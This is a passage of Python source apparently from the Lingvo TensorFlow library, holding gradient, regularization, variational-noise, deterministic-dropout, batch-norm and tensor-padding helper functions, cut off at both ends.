skip_none_gradients: Whether to skip gradients that are None.
defer_crs_to_apply_grad: Whether to defer gradient cross replica sum to
apply_gradient. This applies to TPU only.
activations_grad: The gradients computed for activations.
is_activations: A boolean, whether the input is loss or activations.
tpu_embedding_activations: A `.NestedMap` of tpu embedding feature name ->
embedding feature tensor.
Returns:
var_grad - a `.NestedMap` of VarGrad. You can view
var_grad as an ordered list of (key, (var, grad)) tuples. Every
key of var_grad exists in vmap. Every variable in vmap that
contributes to loss must exist in var_grad. Every var of var_grad
must exist in vmap. grad is the corresponding gradient computed
for var. grad is guaranteed to be not None.
If tpu_embedding_activations is set, a sub `.NestedMap` named
tpu_embedding_var_grads will be used to store the VarGrads for the
activations. In this case, key is the feature name, and var in the VarGrad
is the activation tensor (not a real variable).
"""
if not is_activations:
loss_or_activations = HasRank(loss_or_activations, 0)
if not tpu_embedding_activations:
tpu_embedding_activations = NestedMap()
assert isinstance(tpu_embedding_activations, NestedMap)
assert isinstance(vmap, NestedMap)
assert skip_zero_gradients in (None, 'variable', 'weight')
# Uniqify and remove None.
filtered_vmap = vmap.Filter(_Unique())
assert filtered_vmap is not None
# Filter out variables not contributing to 'loss_or_activations'.
# This doesn't work if the training loop is wrapped inside a tf.function,
# since all variables will be lifted out and trainable_variables will be
# empty. In that case we skip the check.
trainable_variables = set(tf.trainable_variables())
if trainable_variables:
def Needed(v):
if isinstance(v, tf.Variable):
if v not in trainable_variables:
# Skip non-trainable variables. Otherwise,
# tf.Optimizer.apply_gradients throws up an exception instead
# of skipping the update.
return False
return True
filtered_vmap = filtered_vmap.Filter(Needed)
assert filtered_vmap is not None
filtered_vlist = filtered_vmap.Flatten()
# Use caller-supplied gradient function if supplied.
if compute_gradients_fn is not None:
assert not tpu_embedding_activations
take_grad = compute_gradients_fn
else:
# tpu vs non-tpu is slightly different.
if use_tpu():
take_grad = functools.partial(
_ComputeGradientsTpu,
skip_zero_gradients=skip_zero_gradients,
use_bf16_gradients_ar=use_bf16_gradients_ar,
defer_crs_to_apply_grad=defer_crs_to_apply_grad,
activations_grad=activations_grad,
is_activations=is_activations,
tpu_embedding_activations=tpu_embedding_activations.Flatten())
else:
assert not tpu_embedding_activations
take_grad = ComputeGradientsSimple
grads = take_grad(loss_or_activations, filtered_vlist,
grad_aggregation_method, colocate_gradients_with_ops,
gate_gradients)
if tpu_embedding_activations:
tpu_embedding_grads = grads[len(filtered_vlist):]
grads = grads[:len(filtered_vlist)]
else:
tpu_embedding_grads = None
# Formulate pairs of (var, grad) and pack them into the same
# structure as filtered_vmap.
var_grads = filtered_vmap.Pack(
[VarGrad(v, g) for v, g in zip(filtered_vlist, grads)])
if skip_none_gradients:
var_grads = SkipNoneGradients(var_grads)
if tpu_embedding_grads:
# Create VarGrads for TPU embedding activations in a dedicated sub map.
assert 'tpu_embedding_var_grads' not in var_grads
tpu_embedding_activation_list = tpu_embedding_activations.Flatten()
tpu_embedding_var_grads = [
VarGrad(v, g)
for v, g in zip(tpu_embedding_activation_list, tpu_embedding_grads)
]
tpu_embedding_var_grads = tpu_embedding_activations.Pack(
tpu_embedding_var_grads)
# Replace None gradients with zeros, since TPU embedding expect all
# activations to have gradients.
def _NoneToZeros(key, var_grad):
if var_grad.grad is None:
tf.logging.warning(
f'TPU embedding gradient for feature {key} is None. Replacing with '
'zeros.')
return VarGrad(var_grad.var, tf.zeros_like(var_grad.var))
return var_grad
var_grads.tpu_embedding_var_grads = (
tpu_embedding_var_grads.TransformWithKey(_NoneToZeros))
return var_grads
def MaskGradients(var_grad, grad_mask):
"""Computes gradients of non-masked variables in vmap w.r.t loss.
Args:
var_grad: A `.NestedMap` of (variable, gradient)
grad_mask: A dict of (variable name, mask).
Returns:
var_grad - a `.NestedMap` of (variable, mask * gradient).
"""
def ApplyMask(entry):
var, grad = entry
mask = grad_mask[var.name]
if isinstance(grad, tf.IndexedSlices):
return VarGrad(var, tf.IndexedSlices(grad.values * mask, grad.indices))
else:
return VarGrad(var, grad * mask)
return var_grad.Transform(ApplyMask)
def ApplyGradMultiplier(vs_gs, grad_scale=None):
"""Scale gradients by grad_scale on same device as corresponding variables.
Args:
vs_gs: A `.NestedMap` of VarGrad.
grad_scale: If None, each vs_gs entry has the scale. Otherwise, grad_scale
applies to every entry.
Returns:
A `.NestedMap` of (variable, gradient * grad_scale). In particular, if
grad_scale is 0, the result gradient is always 0, even if the input
gradient is inf or nan.
"""
def ScaleOrZero(var, grad, scale):
grad = CheckNumerics(grad, 'Gradient for %s is not finite.' % var.name)
return tf.where(
tf.equal(scale, 0.), tf.zeros_like(grad),
tf.cast(scale, grad.dtype) * grad)
def Scale(item):
"""Scales the gradient."""
var, grad = item
assert grad is not None, ('No grad found for ', var.name)
if grad_scale is None:
scale = item.scale
else:
scale = grad_scale
with tf.device(var.device):
if isinstance(grad, tf.IndexedSlices):
grad = tf.IndexedSlices(
ScaleOrZero(var, grad.values, scale), grad.indices,
grad.dense_shape)
else:
grad = ScaleOrZero(var, grad, scale)
return VarGrad(var, grad)
return vs_gs.Transform(Scale)
def HasNanOrInf(x):
if isinstance(x, tf.IndexedSlices):
x = x.values
with tf.device(x.device):
if x.dtype.is_complex:
return tf.reduce_any(
[HasNanOrInf(tf.math.real(x)),
HasNanOrInf(tf.math.imag(x))])
return tf.reduce_any(
tf.math.logical_or(tf.math.is_nan(x), tf.math.is_inf(x)))
def HasNanOrInfGradient(var_grads):
"""Returns a bool tensor to indicate if `var_grads` contains NaNs or Infs.
Args:
var_grads: A `.NestedMap` with (var, grad) tuple as the map value.
Returns:
A bool scalar tensor to indicate if the `var_grads` contains NaNs or Infs.
"""
return tf.reduce_any([HasNanOrInf(g) for (_, g) in var_grads.Flatten()])
def ApplyGradNormClipping(vs_gs, norm=1.0):
"""Clip gradients to norm on same device as corresponding variables.
Args:
vs_gs: A `.NestedMap` of VarGrad.
norm: Each tensor's gradient will be scaled down to have a maximum L2-norm
value of `norm`.
Returns:
A `.NestedMap` of VarGrad(variable, scaled_gradient). In particular, if
grad_scale is 0, the result gradient is always 0, even if the input
gradient is inf or nan.
"""
def ClipByNorm(var, grad, norm):
grad = CheckNumerics(grad, 'Gradient for %s is not finite.' % var.name)
return tf.clip_by_norm(grad, norm)
def Clip(item):
"""Scales the gradient."""
var, grad = item
assert grad is not None, ('No grad found for ', var.name)
with tf.device(var.device):
if isinstance(grad, tf.IndexedSlices):
grad = tf.IndexedSlices(
ClipByNorm(var, grad.values, norm), grad.indices, grad.dense_shape)
else:
grad = ClipByNorm(var, grad, norm)
return VarGrad(var, grad)
return vs_gs.Transform(Clip)
SKIP_LP_REGULARIZATION = '__lingvo_skip_lp_regularization'
def AdjustGradientsWithLpLoss(var_grads, lp_regularizer_weight, p=2.0):
"""Adjusts the map of (var, grad) with Lp regularization, where p=1.0 or 2.0.
Args:
var_grads: a `.NestedMap` or list of (variable, gradient).
lp_regularizer_weight: Lp regularization weight.
p: For now we support 1.0 or 2.0.
Returns:
A tuple (lp_loss, var_grads).
- lp_loss: A scalar. The lp loss.
- var_grads: a `.NestedMap` or list of (variable, gradient) regulated by Lp.
"""
# TODO(yuancao): For now we support p=1 or 2, but this can be extended to
# lp-norm in general.
assert p in [2.0, 1.0], 'For now we only support L1/L2 regularization.'
def GetVar(item):
var, grad = item
if isinstance(grad, tf.IndexedSlices):
with tf.device(var.device):
ids = HasRank(grad.indices, 1)
uniq_ids = tf.unique(ids).y
return tf.gather(var, uniq_ids)
else:
return var
def ShouldAdjust(v):
return not _VarInCollection(v, tf.get_collection(SKIP_LP_REGULARIZATION))
filtered_var_grads = [
var_grad for var_grad in Flatten(var_grads) if ShouldAdjust(var_grad.var)
]
filtered_vars = Transform(GetVar, filtered_var_grads)
for v in filtered_vars:
tf.logging.info('AdjustGradientsWithLpLoss: %s', v.name)
if p == 2.0:
lp_loss = 0.5 * lp_regularizer_weight * SumSquared(filtered_vars)
elif p == 1.0:
lp_loss = lp_regularizer_weight * SumAbs(filtered_vars)
def LpGrad(var_grad):
"""Adjusts item's grad w/ Lp loss term."""
var, grad = var_grad
if isinstance(grad, tf.IndexedSlices):
# Question(rpang): do we apply Lp loss here even if 'var' is in
# SKIP_LP_REGULARIZATION?
#
# Note: IndexedSlces appears for embedding lookups.
# Embedding lookup ids can have duplicate. For duplicated ids, we
# only want to consider once for each ids.
with tf.device(var.device):
emb = HasRank(var, 2)
vocab_size = tf.shape(emb)[0]
ids = HasRank(grad.indices, 1)
values = tf.gather(emb, ids) # [#ids, dims]
with tf.device(grad.device):
# Counts is a vector of size vocab_size. counts[i] is i-th words
# occurrences in 'ids'.
counts = tf.math.unsorted_segment_sum(
tf.ones_like(ids, dtype=values.dtype), ids, vocab_size)
# Gradients for duplicated ids will be summed when they get
# applied, and hence we account for that by first dividing
# gradient resulting from lp loss by how many times the id is
# duplicated.
#
# For each id in 'ids', we know counts[id] is non-zero,
# hence, it's always safe to take reciprocal.
weights = tf.math.reciprocal(tf.gather(counts, ids))
weights = tf.expand_dims(weights, -1) # [#ids, 1]
if p == 2.0:
grad_v = values
elif p == 1.0:
grad_v = tf.sign(values)
delta = lp_regularizer_weight * weights * grad_v
grad = tf.IndexedSlices(grad.values + delta, ids)
elif not _VarInCollection(var, tf.get_collection(SKIP_LP_REGULARIZATION)):
with tf.device(var.device):
if p == 2.0:
grad_v = var
elif p == 1.0:
grad_v = tf.sign(var)
delta = lp_regularizer_weight * grad_v
with tf.device(grad.device):
grad += delta
return VarGrad(var, grad)
return lp_loss, Transform(LpGrad, var_grads)
def SplitRecursively(x, num_splits, axis=-1):
"""Splits Tensors in 'x' recursively.
Args:
x: a Tensor, or a list or NestMap containing Tensors to split.
num_splits: number of splits per Tensor.
axis: the split axis.
Returns:
A list of split values of length 'num_splits'.
- If 'x' is a Tensor, a list of split Tensors.
- If 'x' is a list, a list of lists, where each sublist has the same length
as 'x' and the k'th element in each sublist corresponds to a split of the
k'th element from 'x'.
- If 'x' is a `.NestedMap`, a list of `.NestedMap`, where each field
corresponds to a split from the same field of 'x'.
"""
if isinstance(x, tf.Tensor):
return tf.split(x, num_splits, axis=axis)
elif isinstance(x, list):
splits = [SplitRecursively(element, num_splits, axis) for element in x]
splits = list(zip(*splits))
return [list(t) for t in splits]
elif isinstance(x, NestedMap):
results = [NestedMap() for _ in range(num_splits)]
for key, val in x.items():
val_splits = SplitRecursively(val, num_splits, axis)
for i in range(num_splits):
results[i][key] = val_splits[i]
return results
else:
raise TypeError('Unexpected type for SplitRecursively: %s' % type(x))
def ConcatRecursively(splits, axis=-1):
"""Concatenates tensors from 'splits'.
This is the inverse function of SplitRecursively.
Args:
splits: a list of splits to concatenate, where elements can be Tensors,
lists, or `.NestedMap`. The elements must share the same type and
structure. For example, list elements must have the same length;
`.NestedMap` must have the same set of fields.
axis: the concatenation axis.
Returns:
Concatenated data.
- If input 'splits' are Tensors, returns a concatenated Tensor.
- If input 'splits' are lists, returns a list of the same length where the
k'th element represents concatenated data of the k'th element from each
split.
- If input 'splits' are `.NestedMap`, returns a `.NestedMap` with each field
concatenated from corresponding fields of input splits.
Raises:
TypeError: if 'splits' is not a list or elements of 'splits' do not have
known or matching types.
ValueError: if 'splits' is empty or elements of 'splits' do not have
matching structures.
"""
if not isinstance(splits, list):
raise TypeError('Non-list inputs for ConcatRecursively: %s' % splits)
if not splits:
raise ValueError('Empty inputs for ConcatRecursively: %s' % splits)
tmpl = splits[0]
if isinstance(tmpl, tf.Tensor):
return tf.concat(splits, axis=axis)
elif isinstance(tmpl, list):
if not all(isinstance(split, list) for split in splits):
raise TypeError('Type mismatch for ConcatRecursively: %s' % splits)
if not all(len(split) == len(tmpl) for split in splits):
raise ValueError('Length mismatch for ConcatRecursively: %s' % splits)
return [
ConcatRecursively([split[i]
for split in splits], axis)
for i in range(len(tmpl))
]
elif isinstance(tmpl, NestedMap):
if not all(isinstance(split, NestedMap) for split in splits):
raise TypeError('Type mismatch for ConcatRecursively: %s' % splits)
results = NestedMap()
for key in tmpl:
results[key] = ConcatRecursively([split[key] for split in splits], axis)
return results
else:
raise TypeError('Unexpected type for ConcatRecursively: %s' % type(splits))
def WeightedAvg(values, weights, sum_reduction_fn=tf.reduce_sum, name=''):
"""Computes weighted average of values from a tensor.
Args:
values: a tensor of values
weights: a tensor of weights
sum_reduction_fn: called to reduce the values and weights to single value
name: name of metric.
Returns:
A tuple (avg, total_weight).
- avg: weighted average value
- total_weight: sum of all weights
"""
msg = 'shape of values and weights tensors must match for metric ' + name
values = with_dependencies(
[assert_equal(tf.shape(values), tf.shape(weights), message=msg)], values)
total_weight = sum_reduction_fn(weights)
# divide_no_nan only supports tf.{float,complex}*.
dtype = values.dtype if values.dtype is tf.float64 else tf.float32
avg = tf.math.divide_no_nan(
sum_reduction_fn(tf.cast(values, dtype) * tf.cast(weights, dtype)),
tf.cast(total_weight, dtype))
return tf.cast(avg, values.dtype), total_weight
def WeightedAvgOfMetrics(metrics):
"""Computes the weighted average of metrics in the list.
Args:
metrics: list of dictionaries of metrics
Returns:
ret_dict - dictionary of weighted averages of each metrics.
"""
ret_dict = {}
lists_of_metrics = {}
for m in metrics:
for name, (value, weight) in m.items():
if name not in lists_of_metrics:
lists_of_metrics[name] = []
lists_of_metrics[name].append((value, weight))
for name, values_and_weights in sorted(lists_of_metrics.items()):
values = tf.stack([x[0] for x in values_and_weights])
weights = tf.stack([x[1] for x in values_and_weights])
ret_dict[name] = WeightedAvg(values, weights, tf.reduce_sum, name)
return ret_dict
def ConcatPerExampleTensors(per_example):
"""Concatenate per-example tensors from many hosts into one large block.
Args:
per_example: list of dictionaries of per-example tensors.
Returns:
ret_dict - string -> concatenated tensors.
"""
ret_dict = {}
lists_of_per_example = {}
for m in per_example:
for name, value in m.items():
if name not in lists_of_per_example:
lists_of_per_example[name] = []
lists_of_per_example[name].append(value)
for name, values in sorted(lists_of_per_example.items()):
ret_dict[name] = tf.concat(values, 0)
return ret_dict
def CombineMetrics(loss_metric_weight_pairs):
"""Combines metrics from `loss_metric_weight_pairs` according to weights.
Keys must either exist in all metrics, in which it will be processed as a
weighted sum, or exist in only one metrics, in which case it will be copied.
Args:
loss_metric_weight_pairs: a list of (metrics, weight) pairs, where each
weight is a float and each metrics is a dict with str keys and
(metric_value, target_weight) values.
Returns:
A dict with the same set of keys as input metrics and values of
(weighted_sum(metric_value), weighted_sum(target_weight)).
Raises:
ValueError: if there exists a metric that exists in more than one element
of `loss_metric_weight_pairs` but not in all of them.
"""
all_keys = set(
[k for loss_metrics, _ in loss_metric_weight_pairs for k in loss_metrics]) # pylint: disable=g-complex-comprehension
result = {}
for k in all_keys:
count = 0
for loss_metrics, weight in loss_metric_weight_pairs:
if k in loss_metrics:
count += 1
if count > 1 and count != len(loss_metric_weight_pairs):
raise ValueError('Found metric %s which exists in more than one'
'but not all loss metrics.' % k)
total_val = 0
total_target_weight = 0
for loss_metrics, weight in loss_metric_weight_pairs:
if k in loss_metrics:
val, target_weight = loss_metrics[k]
if count == 1:
# Single metric, don't multiply by weight.
total_val = val * target_weight
total_target_weight = target_weight
else:
# Total weighted sum of all predictions.
total_val += weight * val * target_weight
total_target_weight += weight * target_weight
result[k] = (total_val / total_target_weight, total_target_weight)
return result
def AddVN(p, x, per_step=False):
"""Add variational noise to x.
Args:
p: Layer params, with a `vn` subparam containing `VariationalNoiseParams`.
x: Input to add variational noise to.
per_step: Whether to add per_step noise.
Returns:
The input with variational noise added according to params.
"""
if per_step:
if not p.vn.per_step_vn:
return x
else:
if not p.vn.global_vn:
return x
if p.vn.scale is None:
raise ValueError('VN scale must be set.')
if p.vn.deterministic:
seeds = GenerateStepSeedPair(p, GetGlobalStep())
global_step_seed = seeds[0]
op_seed = seeds[1]
if not p.vn.per_step_vn:
global_step_seed = tf.zeros_like(global_step_seed)
if p.vn.seed:
op_seed = tf.convert_to_tensor(p.vn.seed, dtype=op_seed.dtype)
noises = DeterministicVN(
p,
tf.stack([global_step_seed, op_seed]),
tf.shape(x),
mean=0.0,
std=1.0)
noises = tf.cast(noises, x.dtype)
else:
seed = p.vn.seed
if seed and p.vn.per_step_vn:
# TODO(b/171767456): Fix per_step_vn.
# seed += GetGlobalStep() * 203984
pass
noises = tf.random.normal(tf.shape(x), stddev=1.0, seed=seed, dtype=x.dtype)
scale = tf.where(GetGlobalStep() >= p.vn.start_step, p.vn.scale, 0.0)
return x + tf.cast(scale, x.dtype) * noises
def VariationalNoiseParams(scale,
global_vn=False,
per_step_vn=False,
seed=None,
deterministic=True,
start_step=0):
"""Returns a hyperparams for variational noise."""
p = hyperparams.Params()
p.Define(
'scale', scale,
'Std of the variational noise to apply . This can be a scalar,'
' or a scalar tensor.')
p.Define('global_vn', global_vn,
'Adds global variational noise every training setp iff True.')
p.Define('per_step_vn', per_step_vn,
'Adds per-timesetp variational noise iff True.')
p.Define('seed', seed, 'Random seed used to generate noise.')
p.Define(
'deterministic', deterministic, 'If true, generate noise using'
'stateless random ops that are compatible with TF functional ops.')
p.Define(
'start_step', start_step,
'Step starting from which variational noise is added during training.')
return p
def DefaultVN():
return VariationalNoiseParams(scale=None)
# To disable VN of a layer, we use 1.0 in the first input parameter
# of the following function because otherwise it is the same to DefaultVN()
# which will be updated by parent configuration in CopyBaseParams()
def DisableVN():
return VariationalNoiseParams(1.0, False, False)
# Step seed keyed by graph.
_STEP_SEED_DICT = ThreadLocalDict()
# The step seed will increment by np.prod(_STEP_SEED_INCREMENT.stack)
_STEP_SEED_INCREMENT = ThreadLocalStack()
@contextlib.contextmanager
def StepSeedIncrementContext(step):
"""Adds an element to _STEP_SEED_INCREMENT."""
assert step > 0, ('%s' % step)
_STEP_SEED_INCREMENT.stack.append(step)
try:
yield
finally:
_STEP_SEED_INCREMENT.stack.pop()
def GetStepSeed():
"""Gets step_seed."""
key = id(tf.get_default_graph())
if key not in _STEP_SEED_DICT.dict:
ResetStepSeed()
return _STEP_SEED_DICT.dict[key]
def ResetStepSeed(seed=0):
"""Resets step_seed to specified value."""
key = id(tf.get_default_graph())
_STEP_SEED_DICT.dict[key] = tf.convert_to_tensor(seed, dtype=tf.int64)
def MaybeResetStepSeedFromScope():
"""In graph mode, resets step_seed according to the current named scope.
This is used in graph mode to avoid "tensor is from a different graph"
errors that happen when we share random seend tensors too much.
See b/129159299 for more context.
Eager mode does not have this problem, so in eager mode we do nothing.
"""
if not tf.executing_eagerly():
ResetStepSeed(GenerateSeedFromName(tf.no_op(name='new_step_seed').name))
def MaybeResetStepSeed(seed):
"""If we're in graph mode, reset the step seed."""
if not tf.executing_eagerly():
ResetStepSeed(seed)
def GetIncStepSeed():
"""Returns and increments the step_seed."""
step_seed = GetStepSeed()
# TODO(lepikhin): introduce a routine filling a queue of uint32 random seeds
# independent of underlying PRNG used by tensorflow.
inc = np.prod(_STEP_SEED_INCREMENT.stack)
ResetStepSeed(step_seed + inc)
return step_seed
def GenerateStepSeedPair(p, op_seed=None):
"""Generates a seed pair for deterministic random operations in ...
functional loops.
This function retrieves a unique seed pair on each call, based off the current
global step and step seed. The step seed ensures this function returns a
unique seed pair on each call: calling this function automatically increments
the step seed. The step seed is automatically reset at the beginning of each
global step in the model's FProp and works transparently through recurrent.py.
Args:
p: A hyperparams.Params object, containing keys 'random_seed' and
'is_inference'.
op_seed: An additional operation-level seed to apply.
Returns:
A size 2 tensor of op seeds to use for stateless_random ops.
"""
seed_dtype = tf.int32 if use_tpu() else tf.int64
if p.is_inference and p.random_seed is None:
# Ensure GetIncStepSeed is called even inside the shortcut.
# This ensures if p.random_seed is set for other ops that use this function
# that they will get the same seed pair whether or not p.random_seed is set
# for this specific call.
GetIncStepSeed()
# Unlike tf.random*, stateless random ops are completely determined by the
# passed-in seeds. This means at inference time the same inputs will produce
# the same outputs, even if the model is supposed to have randomness such as
# dropout during inference. We inject additional randomness only during
# inference if the graph is exported with random_seed=None as a workaround.
return tf.random.uniform([2], maxval=seed_dtype.max, dtype=seed_dtype)
global_step = tf.cast(GetGlobalStep(), seed_dtype)
step_seed = tf.cast(GetIncStepSeed(), seed_dtype)
seeds = tf.stack([global_step, step_seed])
if p.random_seed is not None:
seeds += p.random_seed
if op_seed is not None:
op_seed = tf.cast(op_seed, seed_dtype)
seeds += op_seed
return seeds
def DeterministicDropout(x, keep_prob, seeds, noise_shape=None, name=None):
"""Similar to `tf.nn.dropout()`, but fully deterministic.
Args:
x: A float Tensor on which to apply dropout.
keep_prob: A scalar `Tensor` of keep probability.
seeds: A Tensor of shape [2]. 2 seeds for deterministic random number
generator.
noise_shape: A 1-D `Tensor` of type `int32`, representing the shape for
randomly generated keep/drop flags.
name: An optional name for this operation.
Returns:
A Tensor with the same shape as `x`.
Raises:
InvalidArgumentError: if keep_prob is invalid.
"""
if isinstance(keep_prob, numbers.Real):
if keep_prob <= 0 or keep_prob > 1:
raise tf.errors.InvalidArgumentError(
'keep_prob must be in range (0, 1]. Value: {}'.format(keep_prob))
if keep_prob == 1:
return x
with tf.name_scope(name, 'dropout', [x]) as name:
if use_tpu():
seeds = tf.cast(seeds, tf.int32)
keep_prob = tf.convert_to_tensor(
keep_prob, dtype=tf.float32, name='keep_prob')
# uniform in [keep_prob, 1.0 + keep_prob)
# StatelessRandomUniform op does not support non-float (e.g. bfloat16) dtype
# and non-int32 seed types.
noise_shape = noise_shape or GetShape(x)
random_tensor = keep_prob + tf.random.stateless_uniform(
noise_shape, seed=seeds, dtype=tf.float32)
# 0. if [keep_prob, 1.0) and 1. if [1.0, 1.0 + keep_prob)
binary_tensor = tf.floor(random_tensor)
if x.dtype != tf.float32:
binary_tensor = tf.cast(binary_tensor, x.dtype)
keep_prob = tf.cast(keep_prob, dtype=x.dtype)
result = tf.div(x, keep_prob) * binary_tensor
result.set_shape(x.get_shape())
return result
def DeterministicVN(params, seeds, noise_shape, mean=0.0, std=1.0, name=None):
"""Produces Fully deterministic Gaussian noise from shape, mean and std.
Args:
params: Nested map of params.
seeds: A Tensor of shape [2]. 2 seeds for deterministic random number
generator.
noise_shape: A 1-D `Tensor` of type `int32`, representing the shape for
randomly generated Gaussian noise.
mean: Mean for the Gaussian noise.
std: Standard deviation for noise.
name: An optional name for this operation.
Returns:
A Tensor with the shape noise_shape and type fprop_dtype.
"""
with tf.name_scope(name, 'gaussian_noise') as name:
if use_tpu():
seeds = tf.cast(seeds, tf.int32)
random_tensor = mean + (
std * tf.random.stateless_normal(noise_shape, seed=seeds))
if FPropDtype(params) != tf.float32:
random_tensor = tf.cast(random_tensor, FPropDtype(params))
return random_tensor
BATCH_NORM_UPDATES = 'batch_norm_updates'
_BATCH_NORM_UPDATES_DICT = '__batch_norm_update_dict'
_get_batch_norm_updates_dict = _CollectionGetter(_BATCH_NORM_UPDATES_DICT,
lambda: {})
def UpdateBatchNormVars(batch_norm_var, batch_norm_stats, decay):
"""Update batch normalization moving averages."""
with tf.name_scope(
'AssignMovingAvg', values=[
batch_norm_var,
batch_norm_stats,
decay,
]) as scope:
with tf.ops.colocate_with(batch_norm_var):
decay = tf.convert_to_tensor(
1.0 - decay, dtype=batch_norm_var.dtype.base_dtype)
update_delta = (batch_norm_var - tf.cast(
batch_norm_stats, batch_norm_var.dtype.base_dtype)) * decay
has_nan_or_inf = tf.reduce_any(
tf.math.logical_or(
tf.math.is_nan(update_delta), tf.math.is_inf(update_delta)))
update_delta = tf.where(has_nan_or_inf, tf.zeros_like(update_delta),
update_delta)
bn_update = tf.assign_sub(batch_norm_var, update_delta, name=scope)
tf.add_to_collection(BATCH_NORM_UPDATES, bn_update)
if not tf.executing_eagerly_outside_functions():
bn_update_dict = _get_batch_norm_updates_dict()
if bn_update.name in bn_update_dict:
raise ValueError(f'BN update {bn_update.name} already exists.')
bn_update_dict[bn_update.name] = (batch_norm_var, batch_norm_stats)
return bn_update
def FindRelevantBatchNormUpdates(loss, batch_norm_updates):
"""Finds and returns a list of relevant batch-normalization updates.
Args:
loss: The loss that is being optimized for. A tensor or a list of tensors.
batch_norm_updates: A list of batch normalization updates.
Returns:
A pair of lists. The first list contains all the batch normalization updates
that are relevant to the loss being optimized, and the second list contains
all in batch_norm_updates but not in the first list.
"""
if tf.executing_eagerly():
return [], []
dependent_ops_and_tensors = set(FindNeeded(loss))
relevant_updates = []
irrelevant_updates = []
bn_update_dict = _get_batch_norm_updates_dict()
for bn_update in batch_norm_updates:
assert bn_update.name in bn_update_dict, (
'%s is probably not a valid batch normalization update op.'
' Make sure batch normalization is done through calling'
' the py_utils.UpdateBatchNormVars helper routine.')
bn_stat_name = bn_update_dict[bn_update.name][1].name
if bn_stat_name in dependent_ops_and_tensors:
# If a batch normalization stat is computed in the forward pass in
# computing loss, then the corresponding batch normalization update is
# relevant. Otherwise, it is not.
relevant_updates.append(bn_update)
else:
irrelevant_updates.append(bn_update)
return relevant_updates, irrelevant_updates
_SAMPLE_STEP_STACK = ThreadLocalStack()
@contextlib.contextmanager
def SampleStep(step):
"""A context for a sample step during decoding.
Example usage::
with py_utils.SampleStep(step):
sample = self.DecodeOneStep()
Args:
step: the step tensor.
Yields:
a context manager for the step scope.
"""
try:
_SAMPLE_STEP_STACK.stack.append(step)
yield step
finally:
_SAMPLE_STEP_STACK.stack.pop()
def _GetSampleStep():
return _SAMPLE_STEP_STACK.stack[-1] if _SAMPLE_STEP_STACK.stack else None
def AddDebugTensor(tensor, summarize=None, name=None):
"""Adds `tensor` to the debug collection.
Prints the tensor if `--print_debug_tensors` is True.
Args:
tensor: A tensor.
summarize: Only print this many entries of each tensor. If None, then a
maximum of 3 elements are printed per input tensor.
name: An optional name for the tensor.
Returns:
A Tensor that evaluates to the same value as the input tensor.
"""
if _FromGlobal('print_debug_tensors'):
step = _GetSampleStep()
tensors_to_print = ([] if step is None else [step]) + [tensor]
with tf.name_scope(name) as s:
tensor = tf.Print(
tensor,
tensors_to_print,
message='DEBUG tensor %s' % s,
name=name,
summarize=summarize)
return tensor
def ArgMax(inputs):
"""tf.argmax wrapper.
Args:
inputs: A tensor, whose last dimension is being reduced on.
Returns:
A tensor of rank tf.rank(logits)-1. If i == ret[indices],
logits[indices, i] is the maximum among logits[indices, :].
"""
if use_tpu():
return tf.argmax(inputs, axis=-1, output_type=tf.int32)
else:
return tf.argmax(inputs, axis=-1)
def _EnsureMatrixShape(x):
if x.shape.ndims is None:
x.set_shape([None, None])
else:
assert x.shape.ndims == 2
return x
def Matmul(x, y, *args, **kwargs):
"""tf.matmul wrapper expecting x and y are actually matrices."""
x = _EnsureMatrixShape(x)
y = _EnsureMatrixShape(y)
return tf.matmul(x, y, *args, **kwargs)
def clip_by_value(t, clip_value_min, clip_value_max, name=None): # pylint: disable=invalid-name
if t.dtype.is_complex:
return tf.complex(
tf.clip_by_value(
tf.math.real(t), clip_value_min, clip_value_max, '%s_real' % name),
tf.clip_by_value(
tf.math.imag(t), clip_value_min, clip_value_max, '%s_imag' % name))
return tf.clip_by_value(t, clip_value_min, clip_value_max, name)
def _TransformAndSum(tensor_list, transform):
with tf.name_scope('TransformAndSum'):
sum_transform = []
for t in tensor_list:
with tf.device(t.device):
if isinstance(t, tf.IndexedSlices):
sum_transform += [tf.reduce_sum(transform(t.values))]
else:
sum_transform += [tf.reduce_sum(transform(t))]
return tf.add_n(sum_transform)
def SumSquared(tensor_list):
return _TransformAndSum(tensor_list, lambda v: v**2)
def SumAbs(tensor_list):
return _TransformAndSum(tensor_list, tf.abs)
def ReduceRms(x: tf.Tensor) -> tf.Tensor:
"""Computes root mean square of tensor x with numerical stability."""
if not x.shape.is_fully_defined():
raise ValueError('Shape of x must be fully defined.')
if not x.shape.as_list():
return x
denom = functools.reduce((lambda x, y: x * y), x.shape.as_list())
if denom <= 1e8:
return tf.math.sqrt(tf.math.reduce_mean(tf.math.square(x)))
tf.logging.info('reduce_rms %s denom=%d', x, denom)
sum_square_x = tf.math.reduce_sum(tf.math.reduce_sum(tf.math.square(x), -1))
avg_square_x = sum_square_x / tf.constant(denom, dtype=sum_square_x.dtype)
return tf.math.sqrt(avg_square_x)
def PiecewiseConstant(x_in, boundaries, values, vdtype):
"""Returns the piecewise value of x_in."""
x_in = tf.cast(tf.convert_to_tensor(x_in), tf.float32)
assert len(values) == len(boundaries) + 1
assert sorted(boundaries) == list(boundaries)
bs = tf.convert_to_tensor(boundaries, dtype=tf.float32)
vs = tf.convert_to_tensor(values, dtype=vdtype)
# The following is equivalent to 'return vs[index]'.
index = tf.reduce_sum(tf.cast(tf.greater_equal(x_in, bs), tf.int32))
one_hot_vec = tf.one_hot(
tf.expand_dims(index, 0), depth=len(values), dtype=vdtype)
return Matmul(tf.reshape(vs, (1, -1)), tf.transpose(one_hot_vec))[0][0]
def PadSequenceDimension(x, length, pad_val, shape=None, axis=1):
"""Pads x to `length` using `pad_val` along the axis dim.
Assumes `x` is a tensor with rank >= 2, and it only pads `x` to `length`
along the axis dim. Explicitly sets the returned tensor shape to `shape` if
given. Raises runtime errors if x.shape[axis] > length or
x.shape[i] != shape[i] where i != axis.
Args:
x: the tensor to be padded with axis dimension being the time. E.g., x
usually has shape [batch, seq_len, ...], when axis=1.
length: an int to specify the length to pad x to.
pad_val: an int or float used to pad x.
shape: an int array specifying the shape of the padded tensor if specified.
axis: The dimension that x will be padded, default to 1.
Returns:
The padded tensor with shape [batch, seq_len, ...], where
ret[:, :seq_len, ...] == x, when axis=1, and similarly for other axes.
"""
if x.shape.ndims is not None:
rank = x.shape.ndims
assert rank >= 2
slen = GetShape(x, rank)[axis]
pad_len = length - slen
pad = [[0, 0] for _ in range(rank)]
pad[axis][1] = pad_len
else:
rank = tf.rank(x)
with tf.control_dependencies([assert_greater_equal(rank, 2)]):
slen = tf.shape(x)[axis]
pad_len = length - slen
